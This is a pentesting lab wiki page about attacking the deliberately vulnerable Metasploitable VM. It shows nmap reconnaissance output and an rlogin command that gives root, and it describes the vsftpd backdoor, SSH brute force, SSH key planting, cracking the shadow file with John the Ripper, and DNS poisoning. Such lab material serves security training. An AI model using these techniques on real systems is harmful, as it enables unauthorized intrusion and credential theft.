From charlesreid1

Metasploitable is a virtualbox for pentesting practice.

Services

For reference, a list of services running on the metasploitable machine:

Services
========

host       port  proto  name         state  info
----       ----  -----  ----         -----  ----
10.0.0.27  21    tcp    ftp          open   vsftpd 2.3.4
10.0.0.27  22    tcp    ssh          open   OpenSSH 4.7p1 Debian 8ubuntu1 protocol 2.0
10.0.0.27  23    tcp    telnet       open   Linux telnetd
10.0.0.27  25    tcp    smtp         open   Postfix smtpd
10.0.0.27  53    tcp    domain       open   ISC BIND 9.4.2
10.0.0.27  80    tcp    http         open   Apache httpd 2.2.8 (Ubuntu) DAV/2
10.0.0.27  111   tcp    rpcbind      open   2 RPC #100000
10.0.0.27  139   tcp    netbios-ssn  open   Samba smbd 3.X workgroup: WORKGROUP
10.0.0.27  445   tcp    netbios-ssn  open   Samba smbd 3.X workgroup: WORKGROUP
10.0.0.27  512   tcp    exec         open   netkit-rsh rexecd
10.0.0.27  513   tcp    login        open
10.0.0.27  514   tcp    tcpwrapped   open
10.0.0.27  1099  tcp    java-rmi     open   Java RMI Registry
10.0.0.27  1524  tcp    shell        open   Metasploitable root shell
10.0.0.27  2049  tcp    nfs          open   2-4 RPC #100003
10.0.0.27  2121  tcp    ftp          open   ProFTPD 1.3.1
10.0.0.27  3306  tcp    mysql        open   MySQL 5.0.51a-3ubuntu5
10.0.0.27  3632  tcp                 open
10.0.0.27  5432  tcp    postgresql   open   PostgreSQL DB 8.3.0 - 8.3.7
10.0.0.27  5900  tcp    vnc          open   VNC protocol 3.3
10.0.0.27  6000  tcp    x11          open   access denied
10.0.0.27  6667  tcp    irc          open   Unreal ircd
10.0.0.27  6697  tcp                 open
10.0.0.27  8009  tcp    ajp13        open   Apache Jserv Protocol v1.3
10.0.0.27  8180  tcp    http         open   Apache Tomcat/Coyote JSP engine 1.1
10.0.0.27  8787  tcp                 open


Recon

Make a box for stuff:

$ mkdir -p box/metasploitable

Start by using nmap to scan the host.

First a fast scan -F:

$ nmap -F 10.0.0.*

Then we can do a more extensive scan:

$ nmap -sS 10.0.0.*

This reveals the IP address of the VirtualBox, which is 10.0.0.27.

We can also do a deeper scan:

$ nmap -sS -sV -A 10.0.0.27

This will reveal an array of services, some of which may be exploitable using metasploit.

Sure enough, the verbose scan returns lots of good information:

$ nmap -sS -sV -A 10.0.0.27

Starting Nmap 7.01 ( https://nmap.org ) at 2016-03-22 18:30 PDT
Nmap scan report for 10.0.0.27
Host is up (0.016s latency).
Not shown: 977 closed ports
PORT     STATE SERVICE     VERSION
21/tcp   open  ftp         vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
22/tcp   open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey: 
|   1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_  2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
23/tcp   open  telnet      Linux telnetd
25/tcp   open  smtp        Postfix smtpd
|_smtp-commands: metasploitable.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, 
| ssl-cert: Subject: commonName=ubuntu804-base.localdomain/organizationName=OCOSA/stateOrProvinceName=There is no such thing outside US/countryName=XX
| Not valid before: 2010-03-17T14:07:45
|_Not valid after:  2010-04-16T14:07:45
|_ssl-date: 2016-03-23T01:31:31+00:00; +33s from scanner time.
53/tcp   open  domain      ISC BIND 9.4.2
| dns-nsid: 
|_  bind.version: 9.4.2
80/tcp   open  http        Apache httpd 2.2.8 ((Ubuntu) DAV/2)
|_http-server-header: Apache/2.2.8 (Ubuntu) DAV/2
|_http-title: Metasploitable2 - Linux
111/tcp  open  rpcbind     2 (RPC #100000)
| rpcinfo: 
|   program version   port/proto  service
|   100000  2            111/tcp  rpcbind
|   100000  2            111/udp  rpcbind
|   100003  2,3,4       2049/tcp  nfs
|   100003  2,3,4       2049/udp  nfs
|   100005  1,2,3      42810/tcp  mountd
|   100005  1,2,3      45599/udp  mountd
|   100021  1,3,4      34385/tcp  nlockmgr
|   100021  1,3,4      60702/udp  nlockmgr
|   100024  1          38085/udp  status
|_  100024  1          52004/tcp  status
139/tcp  open  netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
512/tcp  open  exec        netkit-rsh rexecd
513/tcp  open  login?
514/tcp  open  tcpwrapped
1099/tcp open  java-rmi    Java RMI Registry
1524/tcp open  shell       Metasploitable root shell
2049/tcp open  nfs         2-4 (RPC #100003)
2121/tcp open  ftp         ProFTPD 1.3.1
3306/tcp open  mysql       MySQL 5.0.51a-3ubuntu5
| mysql-info: 
|   Protocol: 53
|   Version: .0.51a-3ubuntu5
|   Thread ID: 8
|   Capabilities flags: 43564
|   Some Capabilities: Support41Auth, SupportsTransactions, Speaks41ProtocolNew, SwitchToSSLAfterHandshake, ConnectWithDatabase, LongColumnFlag, SupportsCompression
|   Status: Autocommit
|_  Salt: w$K,8vk7k8tagd@PR*zK
5432/tcp open  postgresql  PostgreSQL DB 8.3.0 - 8.3.7
5900/tcp open  vnc         VNC (protocol 3.3)
| vnc-info: 
|   Protocol version: 3.3
|   Security types: 
|_    Unknown security type (33554432)
6000/tcp open  X11         (access denied)
6667/tcp open  irc         Unreal ircd
| irc-info: 
|   users: 1
|   servers: 1
|   lusers: 1
|   lservers: 0
|   server: irc.Metasploitable.LAN
|   version: Unreal3.2.8.1. irc.Metasploitable.LAN 
|   uptime: 0 days, 1:05:20
|   source ident: nmap
|   source host: 6D4CD63B.D3975B40.7B559A54.IP
|_  error: Closing Link: cxfhgnbdt[10.0.0.25] (Quit: cxfhgnbdt)
8009/tcp open  ajp13       Apache Jserv (Protocol v1.3)
|_ajp-methods: Failed to get a valid response for the OPTION request
8180/tcp open  http        Apache Tomcat/Coyote JSP engine 1.1
|_http-favicon: Apache Tomcat
|_http-server-header: Apache-Coyote/1.1
|_http-title: Apache Tomcat/5.5
MAC Address: 08:00:27:47:98:AD (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.33
Network Distance: 1 hop
Service Info: Hosts:  metasploitable.localdomain, localhost, irc.Metasploitable.LAN; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_nbstat: NetBIOS name: METASPLOITABLE, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery: 
|   OS: Unix (Samba 3.0.20-Debian)
|   NetBIOS computer name: 
|   Workgroup: WORKGROUP
|_  System time: 2016-03-22T21:31:31-04:00

TRACEROUTE
HOP RTT      ADDRESS
1   16.11 ms 10.0.0.27

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 27.31 seconds

MySQL

See MSF/MySQL for the MySQL exploits using Metasploit framework.

PostgreSQL

One of the services running on metasploitable is PostgreSQL (a.k.a. postgres), so let's continue with the sql theme:

5432/tcp open  postgresql  PostgreSQL DB 8.3.0 - 8.3.7

Metasploitable/Postgres

Rlogin

This one is trivial: ports 512, 513, and 514 are open for "r" servcies. A service has been misconfigured to allow remote access connections from any host.

All you need to do is ask nicely for root!

First, make sure rsh-client is installed, otherwise it will revert to SSH and ask for a password:

# apt-get install rsh-client

Now ask nicely for root:

# rlogin -l root 10.0.0.27
Last login: Tue Mar 22 20:26:16 EDT 2016 from :0.0 on pts/0
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686

The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

To access official Ubuntu documentation, please visit:
http://help.ubuntu.com/
You have new mail.
root@metasploitable:~# 

This machine is now totally compromised!

VSFTP

The particular version of vsftp that is running on metasploitable contains a malicious backdoor that was slipped into the source code. If the username ends in a smiley :) the ftp server will open a listening shell on port 6200.

Metasploitable/VSFTP

SSH

There are several ways to get into a machine using SSH.

SSH Brute Force

(The caveman approach)

The first is to attempt to log in via brute force, using a tool like hydra. This is extremely slow, and requires a list of users on the remote machine. This might come, for example, from the contents of /etc/passwd, which gives you a list of all users on the system. This would enable you to brute-force passwords for some or all users. But if you have access to /etc/passwd, you probably have access to /etc/shadow. These two can be used with John the Ripper to crack login passwords much, much, much faster. Hydra is very slow.

Metasploitable/SSH/Brute Force

SSH Keys

Alternatively, if you have WRITE access to the filesystem through an exploit such as the rlogin trick above, or through a PHP shell introduced through a web app vulnerability, or through a netcat payload, you can generate an SSH key for the attacker machine, and add it to the list of trusted hosts on the remote machine. This enables you to login without a password. This method requires WRITE access to the filesystem, so it needs to be coupled with an NFS or other remote shell exploit.

Metasploitable/SSH/Keys

SSH Exploits

Old or unpatched versions of SSH, or weak cryptographic settings, can also be exploited.

More info at Metasploitable/SSH/Exploits

Shadow File

John the Ripper

You can use the /etc/passwd and /etc/shadow files to crack passwords on a Unix system. You "unshadow" the shadow file (using John the Ripper), then guess at the passwords (using John the Ripper).

General notes about cracking /etc/shadow with John: John the Ripper/Shadow File

Metasploitable-specific notes: Metasploitable/John Shadow File

Network File System

(Also see Linux/File Server page for general notes on NFS in Linux.)

Metasploitable/NFS

DNS Bind

The DNS bind server that is running on port 53 can be poisoned using Metasploit. This takes some care in executing, even locally.

Metasploitable/DNS Bind

Apache

Attacking Apache with Metasploit: Metasploitable/Apache

Attacking Apache with Python: Metasploitable/Apache/Python

Tor's Hammer: Metasploitable/TorsHammer

WebDAV

Abusing WebDAV: Metasploitable/Apache/DAV

Flags